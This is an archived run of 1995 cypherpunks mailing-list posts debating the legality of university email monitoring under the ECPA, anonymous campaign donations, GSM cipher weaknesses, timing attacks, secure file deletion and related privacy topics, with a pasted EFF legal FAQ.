>  Electronic Communications Privacy Act of 1986 (ECPA) (18 U.S.C. ss 2510
> et seq.).  "It shall not be unlawful under this chapter for an operator of
> a switchboard, or an officer, employee, or agent of a provider of wire *or
> electronic* communication service, whose facilities are used in the trans-
> mission of a wire communication, to intercept, disclose, or use that
> communication in the normal course of his employment while engaged in any
> activity which is a necessary incident to the rendition of his service or
> to the protection of the rights or property of the provider of that
> service, except that a provider of wire communication service to the
> public shall not utilize service observing or random monitoring except for
> mechanical or service quality control checks."  18 USC section
> 2510(2)(a)(i). 
> 
> Doesn't seem to leave much room for snooping on contents of messages. 

I disagree.  Instead it implies that interception and administrative 
review of content will be tolerated where it is "a necessary incident to 
the rendition of his service or to the protection of the rights or 
property of the provider of that service."  Note that it will be the 
provider who makes the definition in the ex ante application.

Even worse, the protection that is given is for "a provider of wire 
communication service to the public."

I would be very surprised if, 1> "provider" was anything but a narrowly 
drawn definition, 2> provider to the public is not specifically narrowed 
as well.

> Jay Holovacs <holovacs@ios.com>
> PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
>  (KEY id 1024/80E4AA05) email me for key
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Mon, 18 Dec 1995 00:02:45 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Is ths legal?.. (fwd)
In-Reply-To: <Pine.SUN.3.91.951217101355.22454C-100000@polaris.mindport.net>
Message-ID: <Pine.3.89.9512171010.A7388-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 17 Dec 1995, Black Unicorn wrote:
> 
> I disagree.  Instead it implies that interception and administrative 
> review of content will be tolerated where it is "a necessary incident to 
> the rendition of his service or to the protection of the rights or 
> property of the provider of that service."  Note that it will be the 
> provider who makes the definition in the ex ante application.
> 
The provider is allowed access ONLY for QC purposes. Getting back to thhe 
original point, the provider's ability to interpret the contents of the 
message is in no way required to monitor the system and cannot be used as 
a justification in itself for prohibiting use of crypto. 

Also, what if someone outside the system emails encrypted messages to the 
user. What authority would the sys admin have there??

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email for key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 18 Dec 1995 03:55:57 +0800
To: cypherpunks@toad.com
Subject: Political Cleanup program
Message-ID: <m0tROOn-0008yHC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Politics is traditionally corrupt, it appears, because donors to politicians
and political campaigns expect a quid pro quo for their donations.  Various
unsatisfactory solutions include campaign spending limits, etc.

It occurs to me that it would be a major advance if a system could be set up
that would "blind" campaign donations as to their source:  The donor could
be satisfied that his donation gets to the candidate or cause, but the
candidate couldn't know  who actually paid the money (and the donor would be
unable to prove that he made a donation, for example).  Admittedly there are
a lot of details that need to be worked out, but if this could be
accomplished it would change politics as we know it.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 18 Dec 1995 05:04:25 +0800
To: cypherpunks@toad.com
Subject: Re: Political Cleanup program
Message-ID: <2.2b7.32.19951217203129.0089fe34@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 AM 12/17/95 -0800, you wrote:

>It occurs to me that it would be a major advance if a system could be set up
>that would "blind" campaign donations as to their source:  The donor could
>be satisfied that his donation gets to the candidate or cause, but the
>candidate couldn't know  who actually paid the money (and the donor would be
>unable to prove that he made a donation, for example).  Admittedly there are
>a lot of details that need to be worked out, but if this could be
>accomplished it would change politics as we know it.

I think you would see alot less donations by the corporate powers that be
and the favormongers.  (Which is why such a system will probibly never come
into existance.)  It would be a good step in the right direction.

However...
I live in a state which just inacted a series of campaign reforms.  The
first thing the lobbyists did was find a way to exploit every loophole
possible to get around that legislation.  Such a system would have to be
pretty tight and pretty specific.  (And therefore will be fought against by
almost every politician ansd lobbyiest on the planet.)  The fundraising
dinners will certainly have to go...

 

>
>
>
>
>
>
>
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - R. Rococo |   Ignore the man     |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 18 Dec 1995 02:12:24 +0800
To: cypherpunks@toad.com
Subject: Re: BosniaLINK
In-Reply-To: <199512171340.OAA14680@utopia.hacktic.nl>
Message-ID: <199512171747.MAA06815@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



What I want to know is this: why the hell do you think this is
interesting to cypherpunks, and why do people like you continue to
post random URLs, news stories, etc, that have nothing to do with
cryptography, privacy, or anything else remotely discussed on this
mailing list, even though lots of people repeatedly state that it
isn't desired? Are you an NSA operative attempting to reduce our
effectiveness, or just from a drug company hoping to raise our blood
pressure?

.pm

Anonymous writes:
> 
> URL: http://www.dtic.dla.mil/bosnia/
> 
>    BosniaLINK Banner
>    
>    Welcome to BosniaLINK, the official Department of Defense 
> information




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 18 Dec 1995 06:02:13 +0800
To: cypherpunks@toad.com
Subject: Re: Is ths legal?...
Message-ID: <2.2b7.32.19951217205443.008a13f0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:18 AM 12/17/95 -0500, you wrote:

>Exactly. If Oklahoma University is private, it can establish and enforce
>policies that would be unconstitutional at public schools. Those
>policies become part of the contract and a student must abide by them,
>except when they are administered arbitrarily and capriciously. At a
>public universities, students probably would have more freedom to
>challenge this policy.

In looking at their homepage, it appears to be a state funded school.
(There is not alot of background on the school history or affiliations on
their homepage except for a note that it was founded by the territorial
legislature a number of years before becoming a state..)

|       What is the Eye in the Food Pyramid?      | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Mon, 18 Dec 1995 14:35:04 +0800
To: Jyri Kaljundi <jk@digit.ee>
Subject: Re: Motorola Secure Phone
In-Reply-To: <199512152338.XAA22526@pop01.ny.us.ibm.net>
Message-ID: <199512171141.NAA02997@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> What about cellular phones, especially GSM? As I have heard GSM is 
> supposed to be secure, at least thats what the salespersons tell every 
> time they are selling a GSM.
> 
> I know ciphering algorithms A3, A8 and A5 are used in GSM phones, but I 
> know nothing more about them.

I got the following from mjos@math.jyu.fi a couple of months ago.
Unfortunately I was unable to attend or listen on mbone.  Does anyone
know more about this?

>                  University of Cambridge Computer Laboratory
>
>                                SEMINAR SERIES
>
>
> 10th October    Bill Chambers, King's College, London
>                PROBLEMS OF STREAM CIPHER GENERATORS WITH MUTUAL CLOCK
>		CONTROL
>
> ..

> GSM:n salausalgoritmi on juuri tuota tyyppi. Chambers yritti pit tuota
> nimenomaista esitelm jo yli vuosi sitten, mutta silloin viralliset tahot
> puuttuivat asiaan ja esitys peruttiin. Hn on lytnyt algoritmista aukkoja,
> joiden avulla purkuaika saadaan erittin lyhyeksi.
> 
> ps. ne meist, jotka psevt mboneen ksiksi, voivat seurata tapahtumia
>     liven  :)

[Free translation: The GSM encryption algorithm is of exactly that
type.  Chambers tried to have this particular presentation over an
year ago, but at that time the official side interfered and the
presentation was cancelled.  He has found holes in the algorithm that
can be used to make decryption (without key) very quick.

PS.  Those of us who can get access to mbone, can follow it live.]

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 18 Dec 1995 10:34:03 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Political Cleanup program
In-Reply-To: <m0tROOn-0008yHC@pacifier.com>
Message-ID: <199512172204.OAA22202@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



JB:
>Politics is traditionally corrupt, it appears, because donors to politicians
>and political campaigns expect a quid pro quo for their donations.  Various
>unsatisfactory solutions include campaign spending limits, etc.

I have an unusual view that I've never seen elsewhere: the problem with
our government is not that money or PACs are involved, but that the system
does not handle or resolve the conflicts between them very well. in other
words, in contrary to the current view that all PACs are evil, I think the
problem is not that we have PACs, but that our current system does not
balance their demands in some sensible manner.  the system is
susceptible to corruption. it is conceivable however that there would be
a system that involves money and politics but still avoids corruption.

there seem to be a lot of people who suggest that merely because politics
involves money, it is therefore corrupt. this is an awfully vague and
nebulous line of thinking in my view. are we to suppose that any industry
that involves money (all of them, of course) inevitably moves in 
the direction of corruption? perhaps some more "cynicalpunks" may have 
this view, but I don't share it.

>It occurs to me that it would be a major advance if a system could be set up
>that would "blind" campaign donations as to their source:  The donor could
>be satisfied that his donation gets to the candidate or cause, but the
>candidate couldn't know  who actually paid the money (and the donor would be
>unable to prove that he made a donation, for example).  Admittedly there are
>a lot of details that need to be worked out, but if this could be
>accomplished it would change politics as we know it.

what you describe would allow anonymous bribes. the giver could always identify
his cash donation "out of band" to the receiver. moreover, other observers
would not be aware of the relationship. why do you think this would
be an improvement? to the contrary our current system works hard to require
the disclosure of who donated what to a candidate, so the candidate's potential
hidden agendas and ulterior motives can be revealed. seems reasonable to 
me.

you are probably barking up the wrong tree here on cypherpunks, however,
because most of the key "insiders" here are convinced that democracy is
a proven failure, and that in fact government is invariably corrupt and
oppressive, no matter what the implementation. the "solutions" advocated
here are chiefly withdrawal and subterfuge.

needless to say I disagree with this. I wonder if some day someone will
invent a "killer app" that doubles as a political governing system.
it seems to me politics is one of the last most intractable areas of
human interaction when many others have been harmonized and systematized
by the information revolution. I suspect it will eventually succumb to
technological ingenuity as well. the end result would be a government
that is not perfect, but is at least as good as the population that
drives it, and no worse. (in contrast today we seem to have a government
that is no better than the least common denominator).


JB, I have to wonder however how your ideas about campaign reform tie into 
your prior advocation of political assinations as a legitimate form of
citizen power.  have you given up on the idea of murdering politicians as
a means of political reform? or are you now just coupling that idea with
campaign reform to put some new bells and whistles on 
your overall ideological package?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 17 Dec 1995 23:59:20 +0800
To: cypherpunks@toad.com
Subject: BosniaLINK
Message-ID: <199512171340.OAA14680@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



URL: http://www.dtic.dla.mil/bosnia/

   BosniaLINK Banner
   
   Welcome to BosniaLINK, the official Department of Defense 
information
   system about U.S. military activities in Operation JOINT 
ENDEAVOR, the
   NATO peacekeeping mission in Bosnia. This system is provided 
by the
   Office of the Assistant to the Secretary of Defense for 
Public
   Affairs. All information in BosniaLINK is publicly released
   information from the U.S. government or NATO headquarters.
   
   BosniaLINK contains operation maps, fact sheets, news 
releases,
   biographies of key commanders and leaders, and transcripts 
of
   briefings, speeches and testimony. It is also hyperlinked to 
the NATO
   and State Department information services.
   
   
     
_________________________________________________________________

   
Contents

     * Maps (Dec 8)
     * Fact Sheets (Dec 12)
     * News Releases (Dec 15)
     * Photos (Dec 15)
     * Biographies of Key Commanders and Leaders (Dec 15)
     * Transcripts of Briefings (Dec 15)
     * Speeches and Testimony (Dec 15)
       
   
     
_________________________________________________________________

   
   
   
  RELATED SITES FOR BOSNIA INFORMATION
  
   Air Force Role in Bosnia
   NATO
   U.S. State Department: U.S. Policy on Bosnia
   Navy News Service: Bosnia Operations
   
   
   
     
_________________________________________________________________

   
   BosniaLINK is provided through the cooperative efforts of 
the Office
   of The Assistant to the Secretary of Defense (Public 
Affairs), and the
   Defense Technical Information Center. This is a government 
computer
   system.
   
   
     
_________________________________________________________________

   
   DefenseLINK Home






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 18 Dec 1995 04:31:23 +0800
To: cypherpunks@toad.com
Subject: Re: Is ths legal?...
In-Reply-To: <Pine.3.89.9512171444.F10678-0100000@world.std.com>
Message-ID: <skp7EKS00YUvAEUFUm@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Disclaimer: I'm not a lawyer. Harvey is. (And a pretty damn good one, too.)

-Declan

---------- Forwarded message begins here ----------

Date: Sun, 17 Dec 1995 14:38:24 +0001 (EST)
From: Harvey A Silverglate <has@world.std.com>
Subject: Re: Is ths legal?...
To: "Declan B. McCullagh" <declan+@CMU.EDU>
In-Reply-To: <wkoy1Sq00YUvMl2sVN@andrew.cmu.edu>
Message-Id: <Pine.3.89.9512171444.F10678-0100000@world.std.com>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Declan -
   The answer to the "is this legal?" question is more complex than 
simply "private versus public" university.  There are fairly strict 
federal anti-wiretapping laws.  It is hardly clear that a private 
university may eavesdrop on students' phone or computer conversations, 
even if conducted over the university's network.  Furthermore, many 
states have their own anti-wiretap and anti-eavesdrop laws, which are 
even stricter than federal standards.  I don't have the time nor the 
inclination to do research into Oklahoma law, but we did some research 
into this area of state and federal law for the LaMacchia case and 
concluded that in its investigation of David LaMacchia, MIT very well 
might have violated federal laws.
       Harvey Silverglate






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 17 Dec 1995 20:36:03 +0800
To: cypherpunks@toad.com
Subject: Re: kocher's timing attack
In-Reply-To: <199512150203.VAA00869@opine.cs.umass.edu>
Message-ID: <199512170409.PAA22283@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com (Cypherpunks Mailing List)
  and futplex@pseudonym.com (Futplex)

Futplex writes:
... [in reply to others] ...
> You are overlooking the main point that this is a _timing_ attack. Unless
...
> Just beware of
> people with extremely precise stopwatches at key signing parties ;>

Hold on, you *never* sign directly at key signing parties!

Never take your key where:
  - it could be stolen
  - you suspect others may wish to influence your signing
  - somebody might spy your passphrase (hidden cameras in ceiling)

You take fingerprints, and sign when you get back home.


Re the timing subject, do you think it'd make a good party trick?

  * Think of a number between 20 and 30.
  * for 4-5 numbers a, "Multiply the orignal number by <a>"
  * the number you are thinking of is <number>

Now, anybody have statistics for mental arithmetic?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMNOXuyxV6mvvBgf5AQFEtgP/Wf5I205BAuqiuSEwkslbGP0nwV8ylA0G
nnmS1FFJjFkkfICxEp+/C0iQqLcYpp1ytio+yyWmAE+nDEomcmnQb40ElGjYB/2m
btP6cT9ozfM8lXY6Tfn+G+kduZWfpKyngoMDSPzYSNAuizD5qyUodYJXyjfz4y0p
BoXBMwB9IUA=
=EpU4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Russ Cooper <rcooper@the-wire.com>
Date: Mon, 18 Dec 1995 04:41:53 +0800
To: "'jim bell'" <jimbell@pacifier.com>
Subject: RE: Political Cleanup program
Message-ID: <01BACC91.AB611320@rcooper.the-wire.com>
MIME-Version: 1.0
Content-Type: text/plain


A much simpler solution might be to just force all politicians to give up 
their campaign funds when they retire, or even better, immediately 
following the elections. Today, whatever is left in their campaign funds 
are given over to them when they retire or are forced out of office, on top 
of their lucrative pensions.

Cheers,
Russ





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 18 Dec 1995 08:22:34 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Is ths legal?...
In-Reply-To: <Pine.SUN.3.91.951217055442.19904B-100000@polaris.mindport.net>
Message-ID: <Pine.ULT.3.91.951217151620.973A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 17 Dec 1995, Black Unicorn wrote:

> I this ruling would prevent the Supreme Court from defining 
> something as a privledge or right.
> 
> It would also pose this limitation on states, as they are public 
> entities, and thus driver's licenses cannot be defined as one or the 
> other, which as we all very well know, they are.

I am appending the file from the EFF that talks about the privledge/right 
distinction.  There is a URL as part of the file.

==========
=============== ftp://ftp.eff.org/pub/CAF/faq/just-a-privilege ===============
q: If a state university calls computer or network access a
"privilege", can they remove an individual's access arbitrarily?

a: In most cases no. U.S. courts no longer recognize the wooden
distinction between privileges and rights [Board of Regents v.  Roth,
408 U.S. 564 (1972)].

One need only look at the Constitution to see that "privilege" is
often used to mean something different than its informal use. The 14th
Amendment says "No State shall make or enforce any law which shall
abridge the privileges or immunities of citizens of the United
States;". The Constitution also refers to the "privilege of the writ
of habeas corpus", "privileges and immunities of citizens in the
several States", and "privileged from arrest during their attendance
at the session of their respective houses".

In _Goss v. Lopez_, the Supreme Court said a "student's legitimate
entitlement to a public education is a property interest which is
protected by the Due Process Clause and .. may not be taken away for
misconduct without adherence to the minimum procedures required by
that Clause." The Court went on to say that "the Due Process Clause
also forbids arbitrary deprivations of liberty. 'Where a person's good
name, reputation, honor or integrity is at stake because of what the
government is doing to him,' the minimal requirements of the Clause
must be satisfied."

So what are a university student's property rights?  "The Fourteenth
Amendment requires due process before a governmental entity, such as a
public institution, may deprive one of life, liberty, or property. In
a college setting, a student's good name and reputation are considered
a 'liberty' right, and a student's right to attend college is
considered a 'property' right. Due process would be required before a
student is deprived of either at a public institution." [_A Practical
Guide to Legal Issues Affecting College Teachers_ by Partrica A.
Hollander, D. Parker Young, and Donald D. Gehring.  (College
Administration Publication, 1985).]

So is a student's computer access a property right? I'd say it
depends. On one extreme, I'm confident a student has a property right
in account financed via the student computer or engineering fee. On
the other extreme, if a professor informally gave a student an account
on that professor's personal workstation, the professor could probably
remove that access without due process.

So what about department accounts? In the departments I know of,
accounts are given to any students who meet some set of requirements.
I think this makes them an entitlement for the students who qualify
and hence some modicum of due process is necessary.

ANNOTATED REFERENCES

(All these documents are available on-line. Access information follows.)

=================<a href="http://www.eff.org/CAF/faq/due-process.html">
faq/due-process
=================</a>
* Due Process
 
q: Should users be suspended from the computer pending formal discipline?
 
a: No, with one exception. Just as students should not be expelled
...

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/student.freedoms.a
aup">
academic/student.freedoms.aaup
=================</a>
* Student Freedoms (AAUP)

Joint Statement on Rights and Freedoms of Students -- This is the main
U.S. statement on student academic freedom.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/goss-v-lopez.mnookin">
law/goss-v-lopez.mnookin
=================</a>
* Due Process -- When Required -- Goss v. Lopez -- Mnookin

Comments from _In the Interest of Children_, R. Mnookin (Ed.),
Franklin E.  Zimring and Rayman L.  Solomon (Contrib. Authors). It
reports that the Supreme Court says that some modicum of due process
is necessary unless the matter is trivial or there is an emergency.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/goss-v-lopez.fischer">
law/goss-v-lopez.fischer
=================</a>
* Due Process -- When Required -- Goss v. Lopez -- Fischer

Comments from _Teacher's and the Law_, 3rd edition, by Louis Fischer,
et al. Published in 1991 by Longman. It reports that the Supreme Court
says that some modicum of due process is necessary unless the matter
is trivial or there is an emergency.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/constraints.constitutio
nal">
law/constraints.constitutional
=================</a>
* Constitution -- Public University -- Constraints

Comments from _A Practical Guide to Legal Issues Affecting College
Teachers_ by Partrica A. Hollander, D. Parker Young, and Donald D.
Gehring.  (College Administration Publication, 1985).  Discusses the
constitutional constraints on public universities including the
requires for freedom of expression, freedom against unreasonable
searches and seizures, due process, specific rules.

=================
=================

If you have gopher, you can browse the CAF archive with the command
   gopher gopher.eff.org

These document(s) are also available by anonymous ftp (the preferred
method) and by email. To get the file(s) via ftp, do an anonymous ftp
to ftp.eff.org, and then:

  cd  /pub/CAF/faq
  get due-process
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/law
  get goss-v-lopez.mnookin
  cd  /pub/CAF/law
  get goss-v-lopez.fischer
  cd  /pub/CAF/law
  get constraints.constitutional

To get the file(s) by email, send email to ftpmail@decwrl.dec.com
Include the line(s):

  connect ftp.eff.org
  cd  /pub/CAF/faq
  get due-process
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/law
  get goss-v-lopez.mnookin
  cd  /pub/CAF/law
  get goss-v-lopez.fischer
  cd  /pub/CAF/law
  get constraints.constitutional



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMNRs8zokqlyVGmCFAQGgRwP/e2fqRuiVrDWGWuYAnq1IQhUlhULSPlGY
f8/2+N2/VqblVFsXyOBDA6YgwzTiFgiljOVFo2Bxw3RYyBDxWxr6yDS7BxGf7Zdp
QjhIPP7fAk6wNKu3ACwtq3iap9BsOGcZlF2fGrP3B0jsDQtFxosGMNUiPH8HPs5Z
l1QTiAyZ8yw=
=F7PT
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 17 Dec 1995 12:58:04 +0800
To: jps@monad.semcor.com (Jack P. Starrantino)
Subject: Re: Secured RM ? (source)
In-Reply-To: <9512151425.AA07871@monad.semcor.com>
Message-ID: <199512170428.PAA22362@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello jps@monad.semcor.com (Jack P. Starrantino)
  and cypherpunks@toad.com

...
> I think you can work this way if you open the file for read/write
> access, although I'd be more inclined to take the file name into the
> directory and then walk the inodes.

Yuck!

Opening the file for read/write should be ok on all filesystems
where walking the inodes is doable and ok, and will be more portable.

Walking the inodes has the advantage that it won't run out of disk space,
but I suspect confidential files with holes will be rare.

There's no automatic rm that will also delete all backups of the file.
(You are keeping backups, aren't you?)


Hope I'm making sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMNOcVixV6mvvBgf5AQGrkwQAnyNO9i+U470nlTcjJbu6lTQUNw+8b24L
2rZC/niE0WV9xFXYEQHA8cmFJrpLqp8OcfxZVLU+aYJ6sD2z3ehM5nlT7yoSTxXk
/GSp1DgW8rfu19Ovf7xAe6CBt7/NNo/WNsd6pTev648Dj3tdNBCkqf8IlSu/22qa
FgvShjjz8+Q=
=6ZDm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 18 Dec 1995 10:07:09 +0800
To: cypherpunks@toad.com
Subject: Re: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
Message-ID: <199512172339.PAA05833@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Dec 1995 anonymous-remailer@shell.portal.com wrote:

> On Fri, 15 Dec 1995, Alice de 'nonymous wrote:
> 
> > Can anyone tell me whether Ian Goldberg and David Wagner got their $25,000
> > from Netscape for finding the HUGE security flaws in Netscape's existing 
> > product line??
> >
> > Alice de 'nonymous ...               <an455120@anon.penet.fi>
>                                        ^^^^^^^^^^^^^^^^^^^^^^^^
> 
> Heh, hey Alice, you know this discussion a short time ago where you
> claimed that you wouldn't use PGP for signing because it wasn't secure
> or something, what's with the use of the penet address?

Uhhm, actually, I said that I don't have a secure machine to run PGP
on, and that I didn't feel that I should have to travel across town to use
a secure machine to ask whether or not Ian Goldberg and or David Wagner
got any moola from Netscape or AT&T for helping to make these
companies a fortune.

Did they get their $25,000, or a scholarship, or a Christmas week or 
two at the Halekulani in Honolulu??

They helped out these companies, and here it is, less than ten days to 
Christmas, and what have these companies done??  

Nothing ... nothing at all ... but freeload ...

> Surely a penet address offers even less protection for your id?
> 
> Or have you done something nifty like create the penet address with a
> nymserver address?

Yep, something like that ... you must be paying attention, my friendly
"spoofing" shadow.  The Penet address is simply to prevent huge email from
being mailed to me.  I don't want AT&T or Netscape to mailbomb me for
simply writing the truth about them.

Penet gives me some protection.

I'm not looking to Penet to protect my "identity".  All I want Penet to 
do is provide a way for people to write to me if they want to.



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 18 Dec 1995 06:00:59 +0800
To: Jay Holovacs <holovacs@styx.ios.com>
Subject: Re: Is ths legal?.. (fwd)
In-Reply-To: <Pine.3.89.9512171010.A7388-0100000@styx.ios.com>
Message-ID: <Pine.SUN.3.91.951217155251.2240A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, Jay Holovacs wrote:

> 
> On Sun, 17 Dec 1995, Black Unicorn wrote:
> > 
> > I disagree.  Instead it implies that interception and administrative 
> > review of content will be tolerated where it is "a necessary incident to 
> > the rendition of his service or to the protection of the rights or 
> > property of the provider of that service."  Note that it will be the 
> > provider who makes the definition in the ex ante application.
> > 

> The provider is allowed access ONLY for QC purposes.

This is only explicit with regards to public providers.

 Getting back to thhe 
> original point, the provider's ability to interpret the contents of the 
> message is in no way required to monitor the system and cannot be used as 
> a justification in itself for prohibiting use of crypto. 

Oh?  What if I say that I need to monitor e-mail for data corruption?
Also, you might consider the definition of "intercept."  I suspect it's a 
bit wider than you are accounting for.


> Also, what if someone outside the system emails encrypted messages to the 
> user. What authority would the sys admin have there??

Entirely unrelated to the statute you cite.

> Jay Holovacs <holovacs@ios.com>
> PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
>  (KEY id 1024/80E4AA05) email for key
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 18 Dec 1995 06:20:24 +0800
To: Russ Cooper <rcooper@the-wire.com>
Subject: RE: Political Cleanup program
In-Reply-To: <01BACC91.AB611320@rcooper.the-wire.com>
Message-ID: <Pine.SUN.3.91.951217155607.2240B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, Russ Cooper wrote:

> A much simpler solution might be to just force all politicians to give up 
> their campaign funds when they retire, or even better, immediately 
> following the elections. Today, whatever is left in their campaign funds 
> are given over to them when they retire or are forced out of office, on top 
> of their lucrative pensions.

UH....?

> 
> Cheers,
> Russ
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 18 Dec 1995 09:45:21 +0800
To: cypherpunks@toad.com
Subject: Re: Is ths legal?...
In-Reply-To: <2.2b7.32.19951217205443.008a13f0@mail.teleport.com>
Message-ID: <ckp8qg_00bkNQ1VJVI@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 17-Dec-95 Re: Is ths legal?... by
Alan Olsen@teleport.com 
> In looking at their homepage, it appears to be a state funded school.
> (There is not alot of background on the school history or affiliations on
> their homepage except for a note that it was founded by the territorial
> legislature a number of years before becoming a state..)

My understanding is that it is a state school. But for state action to
be present, there has to be a significant interdependent relationship
